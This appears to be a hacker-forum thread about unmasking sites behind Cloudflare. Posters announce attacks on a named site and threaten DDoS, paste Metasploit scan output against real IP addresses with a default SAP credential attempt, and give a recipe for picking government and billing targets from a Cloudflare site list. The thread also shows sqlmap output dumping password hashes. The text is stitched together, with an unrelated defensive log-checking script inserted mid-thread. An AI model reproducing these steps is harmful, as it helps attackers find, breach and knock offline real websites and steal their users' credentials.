Cloudflare....
#1
.................is -> Shit!

0day.today <------------------
______________
104.24.127.207
Organization: Cloudflare
Country: United States
______________

Hitting them hard in a bit ;)

https://paste.sh/DGn1G1f4#eMWNb_c1gbAs1xyrdy1ZCp8W <---------
Reply
#2
[+] Your collections are located at: /root/.msf4/loot/20171223194654_default_unknown_mongo_injection._350626.txt
[+] http://151.80.37.69:80/IciActionItemServ...mConf?wsdl - redirected (302) to https://www.poneyy.fr/IciActionItemServi...mConf?wsdl (not following)
[+] http://151.80.37.118:80/IciActionItemSer...mConf?wsdl - redirected (301) to https://hermes.thinleen.fr/IciActionItem...mConf?wsdl (not following)
[*] 151.80.37.89:8000 [SAP] Trying 001:SOLMAN_BTC:init1234
[+] http://151.80.37.74:80/htmlb/ - redirected (302) to https://151.80.37.74/htmlb/ (not following)
[*] Exploit running as background job 190.
[+] http://151.80.37.67:80/IciChatLineServic...atLineConf - redirected
151.80.37.64 80 tcp http open nginx/1.10.2
151.80.37.71 79 tcp finger open
151.80.37.80 111 udp sunrpc open 100000 v3
151.80.37.113 79 tcp finger open

*********************Admin appears live and interacting against attacks..

root IP=resolved, to ddos or not >:)
Reply
#3
how did you manage to get the ip tho
Reply
#4
Haha interesting! So you're using a dedicated script for resolving CF?

Are you using Shodan, Censys or something like that? Pretty effective in my experience if you leave backend open with information correlating to the domain name. I've made that mistake before.
Reply
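A defender-side check for the mistake described in post #4, a backend left reachable outside the CDN (added example, not part of the thread): it scans an origin access log for requests whose TCP peer is not in Cloudflare's published ranges. The log format, hostnames and sample lines are constructed, and the range list is a snapshot that should be refreshed from cloudflare.com/ips.

```python
import ipaddress
import re
from collections import Counter

# Snapshot of Cloudflare's published IPv4 ranges (https://www.cloudflare.com/ips-v4).
# Assumption: refresh from that URL before relying on it.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in """
173.245.48.0/20 103.21.244.0/22 103.22.200.0/22 103.31.4.0/22 141.101.64.0/18
108.162.192.0/18 190.93.240.0/20 188.114.96.0/20 197.234.240.0/22
198.41.128.0/17 162.158.0.0/15 104.16.0.0/13 104.24.0.0/14 172.64.0.0/13
131.0.72.0/22""".split()]

# Constructed log format: <peer_ip> <Host header> "<request line>" <status>
LINE = re.compile(r'^(?P<peer>\S+) (?P<host>\S+) "(?P<req>[^"]*)" (?P<status>\d{3})$')

# Constructed sample lines (documentation addresses for the non-CDN peers).
SAMPLE_LOG = """\
104.24.127.207 www.example.test "GET / HTTP/1.1" 200
172.68.10.5 www.example.test "GET /login HTTP/1.1" 200
203.0.113.50 192.0.2.10 "GET / HTTP/1.1" 200
198.51.100.7 www.example.test "GET /admin HTTP/1.1" 403
203.0.113.50 www.example.test "GET /login HTTP/1.1" 200
not a log line
"""

def via_cloudflare(peer):
    """True if the connecting address belongs to a listed CDN range."""
    ip = ipaddress.ip_address(peer)
    return any(ip in net for net in CLOUDFLARE_V4)

def direct_hits(log_text):
    """Return parsed entries whose TCP peer is outside the CDN ranges."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines
        try:
            if not via_cloudflare(m["peer"]):
                hits.append(m.groupdict())
        except ValueError:
            continue  # peer field is not an IP address
    return hits

def summarize(hits):
    """Count direct hits per peer; 2xx/3xx ones mean the origin served content."""
    served = Counter(h["peer"] for h in hits if h["status"][0] in "23")
    return {"direct_peers": Counter(h["peer"] for h in hits), "served": served}

if __name__ == "__main__":
    print(summarize(direct_hits(SAMPLE_LOG)))
```

Any entry under `served` means the origin answered a client that bypassed the CDN; the fix is to firewall the origin so it accepts web traffic only from the CDN ranges, or to require Cloudflare's Authenticated Origin Pulls.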
#5
(12-24-2017, 04:21 PM)PunySh3r Wrote: how did you manage to get the ip tho

Code:
# Save >> https://paste.sh/-8MDrWc4#c-y0g56TpIds0HlOHnjLxSAw Into "Script.rb"

root@tor:~# curl -o CloudFlareHosted.txt https://raw.githubusercontent.com/pirate/sites-using-cloudflare/master/sorted_unique_cf.txt

grep "$word" CloudFlareHosted.txt (word="hosting, courthouse, billing, pos, corporate, state, gov, department, enterprise etc..")




# Run >> ruby Script.rb --byp Url
Anyone can resolve Cloudflare as long as they have not properly configured their site...

The real skill is in hitting the resolved site.

Code:
[15:02:43] [INFO] recognized possible password hashes in column 'passwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]


current user is DBA:    True

database management system users [6]:
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS operating system: Linux
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.5.58

:::0day = Dumping::::

Resolving IP is simple, anyone can do this; taking on a site is the real test of knowledge + skill...
Reply
#6
You might also be interested in cfire and sites like crimeflare, which is used by that Ruby script. Simply enter the domain name into the crimeflare search bar and it sometimes produces the website's real IP address.
Reply
#7
As a Chinese baby said they do not understand the process of introducing your tools
Reply